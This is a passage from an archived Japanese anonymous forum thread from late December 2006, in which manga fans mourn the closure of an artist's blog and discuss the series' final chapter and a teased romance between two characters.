またどこかで再開してくれないかな〜うう〜〜…

165 :花と名無しさん:2006/12/25(月) 12:39:04 ID:???0
完全コミクス派だからブログまで無くなっちゃったら話題が・・
ここも過疎って無くなったら悲しすぎる・・

166 :花と名無しさん:2006/12/25(月) 15:45:14 ID:???0
次スレを見る事はないだろうね

167 :花と名無しさん:2006/12/25(月) 20:32:58 ID:???0
速攻で過疎る罠

168 :花と名無しさん:2006/12/25(月) 23:32:36 ID:???O
ザマ…ちょっとだけだったけどトマ金あった。

番外編が楽しみな展開ww

169 :花と名無しさん:2006/12/26(火) 07:26:37 ID:???0
え?!トマ金あったって?! やばいー気になるー!

170 :花と名無しさん:2006/12/26(火) 08:21:18 ID:???0
ブログ読みたい・・・

171 :花と名無しさん:2006/12/26(火) 10:58:17 ID:???0
>>168
もう少し内容詳しくおながいします。

172 :花と名無しさん:2006/12/26(火) 14:32:28 ID:???0
ブログ見れなくなって毎日が少しだけつまらなくなったよ

173 :花と名無しさん:2006/12/26(火) 14:35:41 ID:???0
>>172
同じく、灰色の毎日だよ・・・はぁorz

174 :花と名無しさん:2006/12/26(火) 14:55:19 ID:???0
最終回立ち読みして来たよ!
トーマスってば金子のことで寅にヤキモチやくなんて!

ていうかトーマス・・マジで嫉妬深い根釜・・?

175 :174:2006/12/26(火) 15:00:44 ID:???0
間違い。
トーマスってば金子のことで寅にヤキモチやくなんて!×
トーマスってば寅のことで金子にヤキモチやくなんて!○

>>172 >>173
胴衣。
筒井タンいっそHP作ってくれたらいいのに・・

176 :花と名無しさん:2006/12/26(火) 16:54:29 ID:???0
そうだよね。なんでHP作らないのかな。
あんなに更新早いしイラストも多いんだしHPの方がいいと思う。

177 :花と名無しさん:2006/12/26(火) 17:22:39 ID:???0
思うんだけど、
最終回落とした時に書いた編集への文句?裏事情?みたいなのが
問題になって、ブログやめるように言われたんじゃないの。
「今後もマーガで書きたいなら・・・」とか言われて。

178 :花と名無しさん:2006/12/26(火) 19:02:32 ID:???O
>>171
ヤキモチ妬きながら金子の顔についた液体をペロリ(少し文章が卑猥なのは悪しからず)

んでそのペロリの前に寅と金子が会話してんだけどそこで寅にトーマスさんとどーなってんの?ヤッちゃった?とか何とか聞かれ狼狽えながら否定しまくる金子……

もはや番外編への伏線としか思えないよこの会話

トマ金もしかしたら…もしかするかも?




まぁ少女漫画でさすがにそれは無いか(´・ω・`)

179 :花と名無しさん:2006/12/26(火) 20:01:17 ID:???0
>>177
ほんとにそうだとしたら怖す…

でもダラダラと編集部に対して悪口を書いてたわけでもないし
「打ち切りになりましたー」って笑い飛ばしてた感じだし
それはないんじゃないかなぁ

180 :花と名無しさん:2006/12/26(火) 20:32:44 ID:???0
>>178
金子の顔についた液体って!?なななななななな何!?

181 :花と名無しさん:2006/12/27(水) 07:32:30 ID:???0
液体・・表現がいやらしすぎるw
トマ金"もしかする"と確実に思ってる(願ってる)私ですよw


182 :花と名無しさん:2006/12/27(水) 10:27:11 ID:???0
トーマスがコーヒー?を入れてる時に金子と口論になって
コーヒーミルク?が金子の顔に飛び散ってそれをトーマスが舌で舐めとる。
ほんの1ページくらいのサービスシーンだた。

183 :花と名無しさん:2006/12/27(水) 13:14:52 ID:???0
筒井タン〜出てきてくれ〜 ヾ(`Д´)ノシ

184 :花と名無しさん:2006/12/27(水) 15:02:53 ID:???0
ブログ再開して欲しい・・・

185 :花と名無しさん:2006/12/27(水) 15:35:21 ID:???0
ブログ無くなって本当に寂しい。無くなって改めて痛感。(´;ω;`)


186 :花と名無しさん:2006/12/27(水) 19:13:49 ID:???0
>>178 >>182
ありがトン

トーマスの方が積極的な感じなのかな?金子もまんざらじゃない?!ww

187 :花と名無しさん:2006/12/27(水) 21:39:36 ID:???0
金子は怯えまくってたよw

188 :花と名無しさん:2006/12/28(木) 12:04:18 ID:???0
│∀・) めずらしく誰もいない

189 :花と名無しさん:2006/12/28(木) 13:11:13 ID:???0
だって書くことねーもんよ

190 :花と名無しさん:2006/12/28(木) 16:19:42 ID:???0
やっぱりブログ閉鎖は大きいね・・・・

191 :花と名無しさん:2006/12/28(木) 18:37:44 ID:???0
ブログ面白かったしね。
筒井タンの漫画も大好きだけど、漫画載ってない時でも
ブログ見てるだけですごく楽しかったな。毎回イラストも可愛かったし。

192 :花と名無しさん:2006/12/28(木) 21:56:24 ID:???0
本人は前から閉鎖を考えてもいたんだろうけど、
『閉鎖』って言い出してから削除までが早すぎたなー。
言い出してからあんな早く消えるとは思わなかった。
まるで逃げるかのような早さで居なくなってしまった。
残念すぎる…!

193 :花と名無しさん:2006/12/28(木) 22:47:50 ID:???0
本当に早かった…
あんなに早く削除するなら今までのイラストこっそりコピっとくんだったw

もちろん無断転載じゃなく一人でこっそり毎日堪能…(*´Д`*)


194 :花と名無しさん:2006/12/29(金) 08:25:45 ID:???0
筒井さーん!ここ見てたらブログ再開おながいしまーす!

195 :花と名無しさん:2006/12/29(金) 21:19:21 ID:???0
イラストはまじで保存しとけば良かった・・・・orz

37 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)